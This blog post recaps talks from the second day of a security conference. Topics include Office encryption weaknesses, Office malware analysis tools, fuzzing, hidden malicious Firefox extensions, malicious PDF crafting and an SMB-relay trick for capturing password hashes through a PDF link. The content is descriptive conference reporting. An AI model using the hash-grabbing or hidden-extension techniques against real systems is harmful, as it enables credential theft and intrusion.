After some coffee and croissants, the second day started with a speech of the Minister of the Economy and Foreign Trade, Jeannot KreckÃ©. He spoke about the importance of security awareness on the Internet and IT infrastructure mentioning the Cyberworld Awareness Security Enhancement Structure (“CASES“) active in Luxembourg.
Due to family issues, Jose Nazario, working for Arbor Networks, had to go back to the United States in emergency. As a specialist of the emerging security threats on the Internet, he should talk about politically motivated Denial of Service attacks (DoS). Sad! In last minute, Eric Filiol came and presented an analyze of Word & Excel encryption. Attacks against Office documents are based on a mix of forensic and cryptographic techniques. Usually documents are protected by the author with a simple password. The default encryption is weak: based on XOR constant patterns (by default to maintain compatibility with older versions). Via advanced settings, RC4 encryption can be enabled. To crack documents encryption, analyze of documents is required and, often, such documents are easy to find on USB sticks, in temporary directories, caches, …
The next slide also covered Office documents: “New advances in Office Malware analysis” by Frank Boldewin (the owner of reconstructer.org). He came back on another important vector of attacks: malicious “business” files like PDF or Office documents spread via e-mail or available online. Exploits for MS Office exist since 2006! (buffer overflows). Frank briefly introduced documents are saved and managed. Parsing of data can be done by Win32 COM API. The shell code and executable (often encrypted) are present is the malicious document. Not much information available at the moment. Tools to analyze malicious documents: DFView, Officecat, FlexHex editor or OffVis. Other tool: the OfficeMalScanner suite created by Frank which has several operating modes:
- Scan mode (Shellcode scanner)
- Info mode (dumps OLE structures, offsets, lengths)
- Inflate mode (decrompress documents – Office files are zipped)
- MalHost-setup is a shellcode runtime environment
A good practice should be to scan automatically all your incoming documents with OfficeMalScranner…
After the coffee break, Gabriel Campana presented his tool called Fuzzgrind. “Fuzzing” became a hot topic in security conferences this year. Last week, during the RSA Conference in London, another tool was presented. How can we define “Fuzzing”? “It is a testing technique that provides invalid, unexpected, or random data to the inputs of a program“. Fuzzgrind is based on two tools: Valgrind and STP. Valgrind is a framework for dynamic binary instrumentation and is supported by multiple architectures. It helps you to perform some profiling on your application (one of the well-known tools is memcheck). STP is a constraint solver. On top, a bunch of Python scripts help to link these two tools. In the real life, Fuzzgrind was successfully used to discover bugs in readelf, swfextract or libtiff.
The next presentation was about fun with Firefox extension malware. The scheduled presentation about side channel attacks: “Sniff Keystrokes With Lasers/Voltmeters” was also canceled in the last minutes. Canded Wuest came back on Firefox and its extensions. How they work, how they are developed (XPI files). One of the first issues is coming from unsigned XPI files. Wth 17 millions of extensions downloaded per day and 150 new ones per day, extensions are a good vector of attack. What can a malicious extension do? EVERYTHING. They are several classic ways to receive a malicious extensions (obscure source, social engineering, …). Note that some extensions can be hidden using the “hidden” tag in the install.rdf file. Good extensions can also be hijacked! Canded showed a live demo of a fully hiddent extension loaded into Firefox: after each launch of the browser, a calc.exe popped up!
After the lunch breach, a lightning talks session (maximum 10 minutes per topic) was proposed.
- Didier Stevens spoke about “Windows 7: ROT13 or VigenÃ¨re?” or how are encoded entries in the registry database (like the history of launched applications).
- Eric Filiol was back with the results of iAWACS2009 contest results about finding weak points in antivirus programs.
- Fernando Gont presented the last updates of the research on TCP security.
- Guillaume DelugrÃ© presented its Origami in PDF, a framework to write malicious PDF files with a small demo of an IRC session embedded in a PDF file 😉
- Finally, Moxie Marlinspike presented a usefu tool for all of us: knockknock
Eric Filiol (again ;-)) and Eddy Deligne presented Perseus: A Coding Theory-based Firefox Plug-in to Counter Botnet Activity. Data collection is important during attacks (botnets) but behind attacks what about privacy concerns or local issues like the HADOPI law in France? The solution is to adopt “noisy coding” instead of encryption.
As cryptography can be prohibited by law in some countries, Perseus works in the same way as HTTPS and encode (by adding noise) all traffic between the browser and the server. If a bad guy intercept the traffic, it must first reconstruct the data, this will consume a lot of resources. Source and documentation is available on mozdev.org. To communicate with the extension, the server must be able to understand “noisy” requests. This is done via an Apache module (the module will be released soon).
Next track covered HostileWRT or “Fully-Automated Wireless Security Audit Platform on Embedded Hardware”. Philippe Langlois, Eugene Parkinson (from /tmp/lab). They presented the same talk during FRHACK in Besancon, September (see my previous post).
Another nice one: SMB relay & PDF file: Via Origami, add an URL in the PDF file pointing to \\a.fake.server.com\file.tmp. Credentials were sent to the SMB share (without warning) The grabbed hash can be decoded via John-the-ripper. Bingo! (very useful in companies to grab passwords). Conclusion as always: take care and do not trust anybody.
That’s all for today…